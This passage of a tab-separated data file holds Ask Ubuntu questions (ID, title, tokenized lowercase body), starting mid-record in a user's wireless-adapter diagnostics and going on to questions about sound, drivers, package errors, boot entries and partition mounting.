gültigkeitsbereich : maschine up loopback running mtu:16436 metrik:1 rx packets:304 errors:0 dropped:0 overruns:0 frame:0 tx packets:304 errors:0 dropped:0 overruns:0 carrier:0 kollisionen:0 sendewarteschlangenlänge:0 rx-bytes:99657 ( 99.6 kb ) tx-bytes:99657 ( 99.6 kb ) wlan0 link encap : ethernet hardware adresse e4 : d5:3d:5c : d1:45 broadcast multicast mtu:1500 metrik:1 rx packets:0 errors:0 dropped:0 overruns:0 frame:0 tx packets:0 errors:0 dropped:0 overruns:0 carrier:0 kollisionen:0 sendewarteschlangenlänge:1000 rx-bytes:0 ( 0.0 b ) tx-bytes:0 ( 0.0 b ) $ iwconfig eth0 no wireless extensions . lo no wireless extensions . wlan0 ieee 802.11bgn essid : off/any mode : managed access point : not-associated tx-power=off retry long limit:7 rts thr : off fragment thr : off power management : on $ route -n kernel-ip-routentabelle ziel router genmask flags metric ref use iface 0.0.0.0 192.168.178.1 0.0.0.0 ug 0 0 0 eth0 169.254.0.0 0.0.0.0 255.255.0.0 u 1000 0 0 eth0 192.168.178.0 0.0.0.0 255.255.255.0 u 1 0 0 eth0 # dazu bitte ein paar pings ping -c 4 < routerip > ping -c 4 www.ubuntuusers.de ping -c 4 213.95.41.11 # abfrage der kanal- und ländereinstellung : iwlist chan eth0 no frequency information . lo no frequency information . wlan0 13 channels in total ; available frequencies : channel 01 : 2.412 ghz channel 02 : 2.417 ghz channel 03 : 2.422 ghz channel 04 : 2.427 ghz channel 05 : 2.432 ghz channel 06 : 2.437 ghz channel 07 : 2.442 ghz channel 08 : 2.447 ghz channel 09 : 2.452 ghz channel 10 : 2.457 ghz channel 11 : 2.462 ghz channel 12 : 2.467 ghz channel 13 : 2.472 ghz # manueller scan der wlan-umgebung : sudo iwlist scan [ sudo ] password for hotryce : eth0 interface does n't support scanning . lo interface does n't support scanning . wlan0 interface does n't support scanning : network is down # zustand der schalter : rfkill list 0 : ideapad_wlan : wireless lan soft blocked : no hard blocked : no 1 : phy0 : wireless lan soft blocked : yes hard blocked : no # abfrage der geladenen kernelmodule $ lsmod lsmod module size used by pci_stub 12623 1 vboxpci 23195 0 vboxnetadp 25671 0 vboxnetflt 23480 0 vboxdrv 287190 3 vboxpci , vboxnetadp , vboxnetflt bnep 18141 2 rfcomm 46620 0 bluetooth 209249 10 bnep , rfcomm parport_pc 32689 0 ppdev 17074 0 autofs4 36534 1 nfsd 255927 2 nfs 301262 0 lockd 76909 2 nfsd , nfs fscache 61094 1 nfs auth_rpcgss 40956 2 nfsd , nfs nfs_acl 12838 2 nfsd , nfs sunrpc 229747 6 nfsd , nfs , lockd , auth_rpcgss , nfs_acl binfmt_misc 17501 1 joydev 17458 0 snd_hda_codec_hdmi 32049 1 snd_hda_codec_conexant 57802 1 uvcvideo 76750 0 i915 520615 4 videobuf2_core 32852 1 uvcvideo videodev 120310 2 uvcvideo , videobuf2_core usblp 18141 0 snd_hda_intel 33492 3 videobuf2_vmalloc 12861 1 uvcvideo drm_kms_helper 49113 1 i915 videobuf2_memops 13405 1 videobuf2_vmalloc rts5139 356200 0 drm 288721 5 i915 , drm_kms_helper snd_hda_codec 134213 3 snd_hda_codec_hdmi , snd_hda_codec_conexant , snd_hda_intel arc4 12530 2 coretemp 13401 0 kvm_intel 132760 0 kvm 414071 1 kvm_intel ghash_clmulni_intel 13221 0 cryptd 20404 1 ghash_clmulni_intel mei 40691 0 psmouse 95595 0 microcode 22804 0 serio_raw 13216 0 ideapad_laptop 18087 0 snd_hwdep 17699 1 snd_hda_codec i2c_algo_bit 13414 1 i915 sparse_keymap 13891 1 ideapad_laptop snd_pcm 96668 3 snd_hda_codec_hdmi , snd_hda_intel , snd_hda_codec snd_seq_midi 13325 0 snd_rawmidi 30513 1 snd_seq_midi snd_seq_midi_event 14900 1 snd_seq_midi snd_seq 61555 2 snd_seq_midi , snd_seq_midi_event snd_timer 29426 2 snd_pcm , snd_seq snd_seq_device 14498 3 snd_seq_midi , snd_rawmidi , snd_seq snd 78921 16 snd_hda_codec_hdmi , snd_hda_codec_conexant , snd_hda_intel , snd_hda_codec , snd_hwdep , snd_pcm , snd_rawmidi , snd_seq , snd_timer , snd_seq_device soundcore 15048 1 snd lpc_ich 17062 0 mac_hid 13206 0 snd_page_alloc 18485 2 snd_hda_intel , snd_pcm video 19391 1 i915 atl1c 41102 0 brcmsmac 531905 0 mac80211 540032 1 brcmsmac bcma 35657 1 brcmsmac brcmutil 14756 1 brcmsmac cfg80211 206797 2 brcmsmac , mac80211 cordic 12575 1 brcmsmac lp 17760 0 parport 46346 3 parport_pc , ppdev , lp hid_generic 12541 0 usbhid 46987 0 hid 100411 2 hid_generic , usbhid # erweiterte system- und fehlermeldungen des kernels mit einem filter für die am häufigsten verwendeten netzwerkkarten und treiber dmesg | egrep 'net|eth|sky|sis|via|3c3|3c5|e100|8139|8169|acx|air|ath|atl|ar9|carl|atme|at7|herm|iwl|ipw|rtl8|r81|rt2|rt3|rt6|rt7|tg3|ssb|wl|b43|b44|ori|pri|p5|zd|ndis|wmi|ns8|fw' [ 0.000000 ] percpu : embedded 28 pages/cpu @ ffff88023fa00000 s83584 r8192 d22912 u262144 [ 0.000000 ] pcpu-alloc : s83584 r8192 d22912 u262144 alloc=1*2097152 [ 0.000000 ] calgary : detecting calgary via bios ebda area [ 0.003368 ] cpu0 : thermal monitoring handled by smi [ 0.199661 ] cpu1 : thermal monitoring handled by smi [ 0.212866 ] cpu2 : thermal monitoring handled by smi [ 0.226055 ] cpu3 : thermal monitoring handled by smi [ 0.494297 ] pci : discovered primary peer bus 03 [ irq ] [ 0.494354 ] pci : discovered primary peer bus 04 [ irq ] [ 0.494409 ] pci : discovered primary peer bus 07 [ irq ] [ 0.494464 ] pci : discovered primary peer bus 08 [ irq ] [ 0.494518 ] pci : discovered primary peer bus 09 [ irq ] [ 0.494573 ] pci : discovered primary peer bus 0a [ irq ] [ 0.494626 ] pci : discovered primary peer bus 0b [ irq ] [ 0.494684 ] pci : discovered primary peer bus 0c [ irq ] [ 0.494739 ] pci : discovered primary peer bus 0d [ irq ] [ 0.494793 ] pci : discovered primary peer bus 0e [ irq ] [ 0.601529 ] audit : initializing netlink socket ( disabled ) [ 0.752034 ] thermal lnxtherm:00 : registered as thermal_zone0 [ 0.752036 ] acpi : thermal zone [ tz00 ] ( 0 c ) [ 0.777857 ] tun : ( c ) 1999-2004 max krasnyansky < maxk @ qualcomm.com > [ 2.245479 ] usb 2-1.1.2 : manufacturer : hewlett-packard [ 31.871602 ] adding 8191996k swap on /dev/sda5 . priority : -1 extents:1 across:8191996k [ 33.416556 ] atl1c 0000:01:00.0 : pci- > apic irq transform : int a - > irq 16 [ 33.446756 ] atl1c 0000:01:00.0 : version 1.0.1.0-napi [ 35.267986 ] microcode : microcode update driver : v2.00 < tigran @ aivazian.fsnet.co.uk > , peter oruba [ 35.276605 ] cfg80211 : ignoring regulatory request set by core since the driver uses its own custom regulatory domain [ 35.293340 ] ieee80211 phy0 : selected rate control algorithm 'minstrel_ht' [ 35.437127 ] cfg80211 : ignoring regulatory request set by core since the driver uses its own custom regulatory domain [ 35.499486 ] usblp 2-1.1.2:1.0 : usblp1 : usb bidirectional printer dev 5 if 0 alt 0 proto 2 vid 0x03f0 pid 0x1504 [ 36.829392 ] fbcon : inteldrmfb ( fb0 ) is primary device [ 45.431999 ] audit_printk_skb : 6 callbacks suppressed [ 47.818956 ] bluetooth : bnep ( ethernet emulation ) ver 1.3 [ 48.685586 ] atl1c 0000:01:00.0 : irq 44 for msi/msi-x [ 48.686115 ] atl1c 0000:01:00.0 : atl1c : eth0 nic link is up < 100 mbps full duplex > [ 48.693769 ] ipv6 : addrconf ( netdev_up ) : wlan0 : link is not ready # konfiguration des networkmanagers $ cat /var/lib/networkmanager/networkmanager.state # konfiguration des networkmanagers cat /etc/networkmanager/networkmanager.conf [ main ] plugins=ifupdown , keyfile dns=dnsmasq [ ifupdown ] managed=false # # # aktionen : sudo rfkill unblock all -- - > problem -- > einfireren . *** sudo modprobe brcmsmac sudo rfkill unblock all iwconfig *** sudo rfkill unblock all -- - > problem in gnome-system-log i can not find a thing . the powermanagement did not change things either . how do i know which is the correct kernel module ? i am really lost . in gnome-system-log i can not find a thing . the powermanagement did not change things either . how do i know which is the correct kernel module ? i am really lost .
267511	resize window actions for left and right placement do n't work	in previous versions of ubuntu i could press the combination of keys several times ( ctrl+alt+num4 or num6 ) to re-size window to different width . now this functionality does n't work on ubuntu 12.04 . though it possible to place to left/right/top/bottom corners with different width so left/right placement should work somehow . how to restore the left/right placement with changing width ?
267513	how to install software that `` requires installation of untrusted packages '' ?	i am using ubuntu 12.10 . when i try to update the software , it shows me this error : requires installation of untrusted packages this requires installing packages from unauthenticated sources . details kalzium-data kanagram kate-data kde-l10n-engb kde-l10n-zhcn kde-runtime-data kdegames-data klettres-data libakonadi-kabc4 liblxc0 libwildmidi-config libwildmidi1 lxc marble-data nepomuk-core-data parley-data tomboy
267514	`` open containing folder '' in firefox does not use my default file manager	my system default is nautilus . but when i right-click in downloads and choose `` open containing folder '' , it opens thunar and not nautilus . how can i change that ?
267521	updating issues	i was updating ubuntu on my computer , but i did n't have time to wait for it so i restarted my computer , now when i boot it , it says it does n't have a mounting device . what can i do ?
267531	lubuntu no sound at all ; no mute , alsa , pulse	apologies if this question has been answered already but i 've scoured these forums and i have n't found anything that works . i recently put together a low spec machine with plans on running lubuntu 12.04 . installation went smoothly however there is no audio whatsoever . i 've tried installing pulseaudio & alsa mixer , made sure auto mute was disabled and played around with all of the settings to no avail . i previously had installed ubuntu 12.04 on the same machine and there were no audio issues , only when i made the switch to lubuntu . my machine 's specs are : amd e-240 apu 2 gb 1066 ram amd radeon hd 6310 onboard graphics realtek alc887 audio chipset i am very grateful for any and all feedback . thanks !
267539	how to rip a dvd in codec h.265	is it possible to rip a dvd in the new h.265 codec ? i only found tools for avc / h.264
267541	can not login after changing password in kubuntu via system settings	i just changed my password in kubuntu 12.04 , via the systems settings dialog . after this i was able to `` sudo su '' and work on some other unrelated tasks . after restarting the computer , i can no longer login as the user whose password was changed . any help , and/or redirection to a bug report on this will be greatly appreciated . i have a lot of files , and work and such on this user 's account , and would hate to lose normal access to it . in the mean time , i will not be changing passwords on user 's until i know the current hazards , caveats . thank you , john
267542	how to issue organize desktop command from the shell	i usually interact with the shell , but i prefer to have the items on the desktop organized . is there a command or a scripting interface to organize the desktop ?
267550	ubuntu server 12.10 not obtaining ip address until a user logs in	i just did a recent install of ubuntu server 12.10 ( no gui , command line only ) on a new system . i noticed that upon booting the server does not obtain an ip address from my router . however , once i log into the machine locally the server shows up on my list of dchp clients and i can connect remotely without issue . after some initial research , i looked at my /etc/network/interfaces/ # the loopback network interface auto lo eth0 iface lo inet loopback # the primary network interface iface eth0 inet dhcp others who had similar issues usually were missing either `` auto eth0 '' or the `` dhcp '' and were able to fix their problem by adding those lines in . my set up seems to be fine the way it is . next up , i tried looking at /etc/local.rc and made two different attempts for the server to add eth0 on boot : attempt # 1 ifup eth0 exit 0 attempt # 2 dhclient eth0 exit 0 yet neither of these changes caused the server to obtain ip before an initial local login . since i 'm trying to run this server headless , being able to remotely login upon boot is pretty important for my needs . any insight would be greatly appreciated since most forums suggest to make the changes that i 've already tried . thanks for your help .
267557	how to temporarily mount a hard drive partition as read-only using nautilus ?	i hibernated windows 7 , then booted ubuntu . when i tried to mount the windows partition , i got this error : i 'd just read that switching oses via hibernating was ok as long as you did n't modify files on the other os 's partition , and i 'm glad nautilus ensures you do n't , but i need to copy some files from that partition . is there a way to make nautilus temporarily mount it as read-only ? i was hoping i could just do something like `` right-click- > mount as read-only '' but that 's not an option . update : for the record , i was able to do it from a terminal using sudo mount -t ntfs-3g -r /dev/sda3 /media/adam/ . it usually mounts to /media/adam/os/ , although it would n't let me do that since the os folder did n't exist . also , i had to authenticate as an admin to unmount it from nautilus since it was mounted as root ( the mount command i listed had to be run as root ) . however , i still a graphical solution would be better and a bit more user-friendly .
267558	what is the best alternative to google reader ?	i enjoy using lightread in ubuntu 12.10 . the thing is google reader is being shutdown and lightread is a client for google reader , so it 's feed will be cut of . what is the best alternative as a rss reader for ubuntu 12.10 ?
267560	how to fix update-manager error `` the package system is broken ''	i am getting the following error with update-manager : the package system is broken check if your are using third party repositories . if so disable them , since they are a common source of problems . furthermore run th efollowing command in a terminal : apt-get install -f details the following package have umet dependencies : e17 : depends : e17-data ( = 201303121532-15432~quantal1 ) but 201303121532-15432~quantal1 is installed depends : libefl-bin ( > =20120000000 ) but it is not installed
267565	where is the python library installed ?	when i try to do ./configure over awn v0.4 i get this error : configure : error : in `/home/desktop/software/avant-window-navigator-0.4.0 ' : configure : error : could not link test program to python . maybe the main python library has been installed in some non-standard library path . if so , pass it to configure , via the ldflags environment variable . example : ./configure ldflags= '' -l/usr/non-standard-path/python/lib '' ============================================================================ error ! you probably have to install the development version of the python package for your distribution . the exact name of this package varies among them . so maybe i can solve this adding the path of the python library to the command . but i do n't know where is it . see the full output here
267567	ubuntu partition . to recover files	linux does not work for me at all right now . never did on this computer . toshiba satellite l750 d . nothing i have tried have brought any results . i am stuck in low graphics mode . and before that , webgl did not work no matter what , except a insanely laggy version in firefox . after rebooting after i removed firefox . i got stuck in this mode . all i want to know is if i can install a partition of ubuntu , take my files from the buggy version and transfer them . so that i can get windows back , since none of the graphics drivers work for my laptop . i tried reinstalling graphic driver , desktop , video driver , failsafe x recovery mode , root commands.. i need this pc for work . would like a windows partition back until i learned a way to make ubuntu work .
267569	installing ubuntu inside windows 7 without internet connection [ offline mode ]	i downloaded ubuntu-12.04-amd64.iso and created a bootable usb . i tried installing it ( by running wubi.exe in windows ) . but the installer started downloading ubuntu-12.04.2-wubi-amd64.tar.xz ( 524 mb ) . my internet connection is too slow to download this file in one stretch . is there any way to do this in offline mode ?
267571	how to open a new tab via a button using the ubuntu touch qt sdk ?	i blame it on my tiredness but i 'm struggling to find how to direct the user to a new tab via a button : i 've got a login page and if the user has placed the right username and password , pressing on the login button will direct the user to a new tab . textfield { id : inputto placeholdertext : `` username : '' } textfield { id : inputfrom placeholdertext : `` password '' echomode : textinput.password } button { objectname : `` button '' width : parent.width text : `` login '' onclicked : { if ( inputto.text == `` -- -- '' & inputfrom.text == `` -- - '' ) { label.text = `` succesful '' } else label.text = `` wrong username or password '' } } can anybody provide me on how to allow the button to direct the user to a new tab ? thankyou : )
267572	how to load an existing windows installation as a virtual guest inside ubuntu	i dual-boot windows 7 and ubuntu 12.04 . i want to be able to virtually boot this windows installation inside ubuntu . while trying to do this using qemu qemu -hda /dev/sda -m 2048 i am able to see the grub loader , i select windows and then i just get the blue screen of death . so , how do i boot the existing installation of windows as a virtual guest in ubuntu . the solution need not be only qemu related . it can be any virtualization solution . note : i do n't want to convert the existing installation into a virtual disk and then use it . i want to be able to directly boot the existing windows installation . basically all changes made to windows from inside ubuntu should reflect in the native windows installation .
267578	12.04 â missing ntfs drives ( partitions ) ?	i have been running 12.04 for a while without a problem . i have 3 ntfs partitions which i used to access through nautilus . now these three partitions are no longer visible under ubuntu ( but still accessible through windows ) . the ubuntu home folder is accessible . in the directory `` /media '' is nothing listed . how can i make the partitions accessible again ? suggestions would be appreciated .
267586	why internet explorer 6 trying to save all webpages ?	i have successfully installed ie 6 using playonlinux , but i 'm unable to browse any site . when i 'm entering any address in the address bar , following message is pops up you are downloading the file : / from www.google.com would you like to open the file or save it to your computer ? some days ago i had installed ie 6 using same procedure , then it was perfect , but now i do n't know why this is happening ? very weird problem indeed . hope this will be solved easily .
267589	digital surround ( hdmi ) output	i recently built a htpc and installed ubuntu 12.10 on it . it 's a shuttle xh61v with an onboard hdmi connection that i 'm using to connect to the tv , which in turn connects to the speaker system ( 5.1 ) . i 've tried everything i can find on this site and through google but to no avail . i 've even tried installing ubuntu 13.04 , but that seems to present the exact same problem . pavucontrol only shows `` digital stereo ( hdmi ) output '' but no surround . running speaker-test -c 6 seems to play to all speakers at once for the front speakers , quieter for the back speakers and not at all for lfe . since it 's running through hdmi , i do n't know if the fact that i 'm using intel hd graphics 4000 comes into play or not . here 's my output for aplay -l : **** list of playback hardware devices **** card 0 : pch [ hda intel pch ] , device 0 : alc662 rev1 analog [ alc662 rev1 analog ] subdevices : 1/1 subdevice # 0 : subdevice # 0 card 0 : pch [ hda intel pch ] , device 1 : alc662 rev1 digital [ alc662 rev1 digital ] subdevices : 1/1 subdevice # 0 : subdevice # 0 card 0 : pch [ hda intel pch ] , device 3 : hdmi 0 [ hdmi 0 ] subdevices : 0/1 subdevice # 0 : subdevice # 0 does anyone have any suggestions ? i would be greatly appreciative of any help . thank you in advance !
267591	empathy chat : people nearby text chat ok but file transfer fails . why ? how to troubleshoot ?	problem : chat works ( sending text and smileys ) with the `` people nearby '' feature but sending files silently fails . going to contact > send file presents the sender with a file chooser and no error is displayed . neither the sender or receiver sees anything change after the sender selects the file and hits 'send ' . any idea why ? our setup : we have a lan with mostly ubuntu 12 clients . home directories are exported from a ubuntu server and authentication is managed with ldap . i can see other users in the contact list window of empathy and each one is showing twice . all the computers are on the same subnet and get their ip addresses via dhcp . they are assigned the same addresses in the dhcp conf with 'fixed address ' declarations tied to mac addresses and the ips are forward and reverse lookup-able by either hostame or fqdn . # etc/resolv.conf nameserver 127.0.0.1 search xx.xx.com # our domain update : if the file transfer is initiated from contacts list window by highlighting the desired recipient , choosing edit > contact > send file , the desired behavior occurs . namely , a transfer progress window opens and informs the user the recipient has to accept the transfer . behavior on the other end works almost as expected except that i saw briefly a third instance of sender 's contact appeared in the contact list window . what does not work , strangely is initiating the same action from an existing chat window by choosing contact > send file . same recipient , same file .
267592	will ubuntu spin down harddrives in an raid 10 array ?	i 'm about to buy parts for a new home server and i 'm planning on using ubuntu ( perhaps 12.04 lts ) for the os , i 'll use an ssd . for cold storage ( big files , rarely accessed ) , i 'm planning on setting up samba and an array of hard drives . specifically , i 'm planning on 4 western digital green 3tb drives on a raid 10 ( ten ) array . will the ubuntu automatically spin the drives down if no programs are actively reading/writing ? does raid make a difference ? are there any configuration setting i should know about ? second , any potential problems with my plan ? 1 ssd for the os and raid 10 for 6tb of storage ? i will need a gui from time to time , so i might install the ubuntu desktop version instead of the server version . ( for work , i need a back-up desktop machine on occasion , so i need a gui . i do not want to buy two machines . )
267593	fglrx works on ubuntu 12.10 ( 32-bit ) , but not ubuntu 12.10 ( 64-bit ) on the same computer . how do i fix it on the 64-bit install ?	i have followed instructions for every option listed here ( uninstalling in between attempts , of course ) , but each one results in unity not loading ; no sidebar , no desktop icons , and no window borders . moreover , it 's incredibly buggy , with programs like firefox often crashing after a few moments of use . here 's a list of some things i think may be relevant : lsmod | grep fglrx and lsmod | grep radeon give no output . fglrxinfo results in a badrequest error . amdcccle runs , but also generates a flood of badrequest errors in the terminal . lspci -nnk | grep vga -a3 indicates that the system is using radeon instead of fglrx , and fglrx is not even listed as a usable kernel module . my /etc/x11/xorg.conf file is here . modprobe fglrx returns fatal : module fglrx not found . but sudo apt-get install fglrx informs me that i have the latest version of fglrx installed . fglrx ran fine on ubuntu 12.10 ( 32-bit ) , but installing ubuntu 12.10 ( 64-bit ) clean and then immediately installing fglrx results in the problems i am experiencing . i am using a radeon hd 7770 . some have told me to simply uninstall fglrx and use ubuntu that way , but ubuntu is ... quite unusable without it . i get about 5 fps average ( with a 7770 ! ) using the default drivers , and compiz runs at 100 % cpu .
267596	why does update-manager download and install updates separately ?	is there a reason why the update manager will download all updates , and then start installing once every single update has been downloaded ? would n't it be faster to start installing updates once one particular update is downloaded ? this is not a duplicate of why-the-software-center-doesnt-allow-multiple-downloads as that explains why the software center does n't allow for multiple packages to be downloaded and installed concurrently . my question pertains to why the downloading and installation of multiple packages ( updates ) is not done concurrently . for example , the update manager will download all updates , then begin to install updates once every package has been downloaded . why would n't it start installing updates as they 're downloaded , in parallel to downloading other updates ? ( sorry if this is n't the right place to ask this question , i just could n't really think of a better place to ask )
267607	system went into read only mode	i am newbie in ubuntu . we have a cloud server in rackspace with following configuration : os - linux version 2.6.35.4-rscloud ( root @ builder.slicehost.com ) ( gcc version 4.4.3 ( ubuntu 4.4.3-4ubuntu5 ) ) # 8 smp mon sep 20 15:54:33 utc 2010 size - 2048 mb ram , 80 gb disk about 5 hours ago system went to read-only mode . 1 hour ago we rescued it with sudo fsck -af found here - read-only file system now i am checking /var/log/dmesg* but i am not able to understand the reason why did it went to read only mode . it would be helpful if someone can point out how can we find the reason for system going in read only mode ? do let me know if any additional information is needed . thanks
267609	desktop does n't load properly when logging in	i have had ubuntu installed on my desktop computer for a few months now , and after an update a error message showed up on both lightdm . when i logged in saying 'could not apply the stored configuration for monitors ' . this was unusual because everything worked fine before the update . i have an nvidia graphics card so i decided to change the driver from the open source version to the proprietary , tested version . from then on every time that i tried to load my desktop there have been errors . many times the computer simply froze and other times only the desktop wallpaper with icons loaded , or the two unity panels loaded with a blank desktop . once i got the unity panels with still the lightdm branding over the wallpaper , with no icons or indicators , and the mouse still frozen . i have since pressed control , alt f2 , logged in and tried to reinstall unity , but this has not helped . i have also managed to log into another account , go startx and then change the driver back , but unity still does n't load . another issue that i seem to have is that when i turn on my computer the ubuntu logo seems to be replaced by just text saying ubuntu 13.04 .
267613	sudo works , but gksudo does n't , why ?	sudo lshw -html > 1.html works perfectly.i get system information in 1.html . but , gksudo lshw -html > 1.html does n't work.i get gksudo usage options in 1.html information : i am developing an app in quickly.i need that my user will have to enter password in a graphical prompt in order to generate a system information report.but os.system ( 'gksudo lshw -html > 1.html ' ) is not working.what is the solution ? edit : one solution found in http : //ubuntuforums.org/showthread.php ? t=1462426 gksudo -- lshw -html > 1.html but what is the significance of -- ?
267615	is any ubuntu version used for software development ?	is any ubuntu version used for software development , system based or web based ?
267619	killed windows , trying to recover data through ubuntu	windows got corrupted during a update , i am trying to access the data on the hdd to back it up to restore windows . the hdd is mounted already , but when i try and acces the hdd , it does not show any data . i tried to change the permissions to be able to view whats on the disk , but it does not let me . every time i change the permission and click apply , they change back to being blank . any info would help thank you . btw i have ubuntu 12.10
267625	apt-get -f install -- vicious circle -- please help !	it has been a long time since i 've asked for help , but i 'm in dire need now . some time ago , i set up a friend 's computer with 10.04 . he 's still running it but somewhere along the way , he started having trouble with his nvidia drivers and seemingly his whole system . remotely , i 've been trying to help him start from scratch and install fresh with 12.10 . the problem is that his cd-rom is broken , and his bios will not allow him to boot from external media , i.e. , usb cd/dvd rom and/or usb flash drives . space on his system partition was very low but has deleted enough to give him just over a gig . i thought the best solution would be to boot from a local iso file through grub2 . however , his system has n't been updated/upgraded to grub2 , he is still using the legacy version . we ca n't seem to upgrade him because , well , i guess you could say apt-get is ( broken ? ) and apt-get -f install is n't fixing it . we ca n't remove or add packages until this is resolved . i 've listed the commands we 've tried and their output . i would appreciate any help that would allow us to update the computer to grub2 and/or do a fresh install of ubuntu . sudo apt-get -f install dpkg : error processing /var/cache/apt/archives/linux-headers-2.6.32-45_2.6.32-45.104_all.deb ( -- unpack ) : unable to create `/usr/src/linux-headers-2.6.32-45/drivers/cpufreq/kconfig.dpkg-new ' ( while processing `./usr/src/linux-headers-2.6.32-45/drivers/cpufreq/kconfig ' ) : no space left on device no apport report written because the error message indicates a disk full error dpkg-deb : subprocess paste killed by signal ( broken pipe ) errors were encountered while processing : /var/cache/apt/archives/linux-headers-2.6.32-45_2.6.32-45.104_all.deb sudo dpkg -- configure -a dpkg : dependency problems prevent configuration of linux-headers-2.6.32-45-generic : linux-headers-2.6.32-45-generic depends on linux-headers-2.6.32-45 ; however : package linux-headers-2.6.32-45 is not installed . dpkg : error processing linux-headers-2.6.32-45-generic ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of linux-headers-generic : linux-headers-generic depends on linux-headers-2.6.32-45-generic ; however : package linux-headers-2.6.32-45-generic is not configured yet . dpkg : error processing linux-headers-generic ( -- configure ) : dependency problems - leaving unconfigured errors were encountered while processing : linux-headers-2.6.32-45-generic linux-headers-generic sudo dpkg -i -- force-overwrite /var/cache/apt/archives/linux-headers-2.6.32-45_2.6.32-45.104_all.deb dpkg : error processing /var/cache/apt/archives/linux-headers-2.6.32-45_2.6.32-45.104_all.deb ( -- install ) : unable to create `/usr/src/linux-headers-2.6.32-45/drivers/cpufreq/kconfig.dpkg-new ' ( while processing `./usr/src/linux-headers-2.6.32-45/drivers/cpufreq/kconfig ' ) : no space left on device dpkg-deb : subprocess paste killed by signal ( broken pipe ) errors were encountered while processing : /var/cache/apt/archives/linux-headers-2.6.32-45_2.6.32-45.104_all.deb sudo apt-get autoremove you might want to run `apt-get -f install ' to correct these . the following packages have unmet dependencies : linux-headers-2.6.32-45-generic : depends : linux-headers-2.6.32-45 but it is not installed e : unmet dependencies . try using -f .
267628	how can i bind gio.settings of textbuffer or textview ?	i 'm trying to bind a textview to the key `` text '' by textbuffer . i get the text , but this property is not recorded . widget = self.builder.get_object ( 'textbuffer_text ' ) settings.bind ( `` text '' , widget , `` text '' , gio.settingsbindflags.default ) i would be grateful for any hints or help
267630	running ubuntu from livecd with no harddisk	can i boot linus from livecd into a copmuter system where computer system doesnot have a physical hard drive .
267636	ubuntu administration privilege ?	i 'm a newbie to linux . i have installed ubuntu 12.10 . how can i have administrative privileges since i am the administrator . on windows if you 're the administrator running and installing an application is easy . in ubuntu launching an application requires an administrative privileges.. can someone enlighten me please , how do i go about this ? thank you .
267644	how to run any x11-app on ubuntu-touch ?	ubuntu touch preview does not use x11 for graphics . the repository for armhf contains virtually all apps available in desktop ubuntu , but they can not be run directly on the tablet ( nexus 10 in my case ) . is there a way to run those using a virtual x-server , perhaps passing through local vnc to be displayed ? i have ssh access to the device , so i can run commands normally .
267647	how can i lock a device id to a particular port address	i want ttyusb0 to be always used by my gsm modem how can i do that even after restart it must not change..is there any way to lock gsm modems id to ttyusb0 .
267650	how can i prevent my main application window getting black ?	i have made an ubuntu app using quickly in ubuntu12.04.in that app 's main window there are several buttons.clicking some of them opens new windows of other applications ( like , firefox , gnome-sound-recorder ) and clicking some of them runs commands in the background ( like , html2text , espeak ) . suppose i have clicked a button which opens sound recorder.now if i start recording in the sound recorder my main application window gets black . again when sound recording is done and i close the sound recorder window , it becomes normal . i think this part of my code is responsible for this : os.system ( 'gnome-sound-recorder ' ) what statement ( s ) should i use instead of the above-mentioned one to prevent my main application window going black ? i have tried using the following statements : child_pid = os.fork ( ) if child_pid == 0 : os.system ( 'gnome-sound-recorder ' ) else : return now , the main app window does n't get black.but , now if i close sound recorder my main app window gets closed.what do i need to change ?
267653	linux swap partition created accidentally	while going through one of the tutorials for installing ubuntu i accidentally created a linux swap for drive d and was unable to undo the change . now my drive does not appear in mycomputer but it shows in disk management . how to recover my d drive ? do i have to format it again , if so is there anyway i can have a backup of my files in d please help . tia
267654	apt-get has a error	when i use : sudo apt-get upgrade i get this error : e : could not open file /var/lib/dpkg/status - open ( 2 : no such file or directory ) e : the package lists or status file could not be parsed or opened . i use : sudo dpkg -- configure -a and i get this : dpkg : error : failed to open package info file `/var/lib/dpkg/status ' for reading : no such file or directory
267655	constant monitoring of answers on a port given	i do need a tool that would work just like ping , but that shows me response on a given port . i do know about telnet and nmap , but they give me only one result , not a constant loop , with which i could see changes over time . is there anything like that ?
267656	creating a multiarch meta package	i 'm trying to create a meta-package to install various dependencies ( for android build system ) , some of the packages should use the i386 version so i tried to use the `` multi-arch '' option but it fails to build . the package looks like this ( removed the other lines here ) : architecture : amd64 multi-arch : allowed depends : libncurses5-dev : i386 and when i run dpkg -- build it says 'depends ' field , reference to 'libncurses5-dev ' : invalid architecture name 'i386 ' : a value different from 'any ' is currently not allowed '' any idea how to proceed ? i 'm running this on ubuntu 12.04 ( server ) .
267663	which application is needed to read genesis rom files	i had downloaded node.js in my ubuntu 11.10 . when i had unzipped and pretend to open readme.md , it prompts me that ' there is no application installed for genesis rom files . please help me by sharing the answer .
267665	how to remove ubuntu from efi boot options	i removed ubuntu from the efi boot menu but it comes back i already use easybcd but it still comes back i try remove it manual from my efi bios but it still comes back i already delete all of my linux partition ( efi / swap ) and i already using efibootmgr via linuxmint but still it comes back its even worse because after i use efibootmgr its change my windows efibootloader behavior i use asus x401u amd c-60 *ubuntu 10.04.01 ( 64bit ) already removed but still in my efi bootmenu *win8pro ( 64bit ) i already follow this ( but via linuxmint ) how do i remove `` ubuntu '' in the bios boot menu ? its still comes back my problem similar like this ubuntu appears in bios menu and im gon na do this i removed ubuntu from the bios menu but it comes back later please help me
267669	can not connect to network in ubuntu server 12.10	i had recently installed an ubuntu 12.10 server edition and i am new to this . during the installation i skipped the configure network section , and now i cant connect to any network . i used the lshw -c network and found that both my wired and wireless adapters are disabled . someone please help me to get this thing fixed . thanks in advance and sorry for the bad english ...
267670	saving subtitles found by the vlc extension `` subtitle finder '' ?	i found a vlc script called 'subtitle finder ' ( here ) that downloads and displays video subtitles 'on-the-fly ' : they are downloaded and displayed during playback , and it works great , but does not saves subtitle file for the future : the whole procedure has to be restarted each time . ( see this answer . ) while the script says ‘download subtitles’ , i imagine they are downloaded and saved temporarily during playback : where are they downloaded ? can i manually save them for future use ? maybe someone could find the answer by taking a look at the script .
267671	how do i set the time ?	system settings - > date and time . this dialog allows to set time zone and date , but does n't allow to set the time . how can i change the time ?
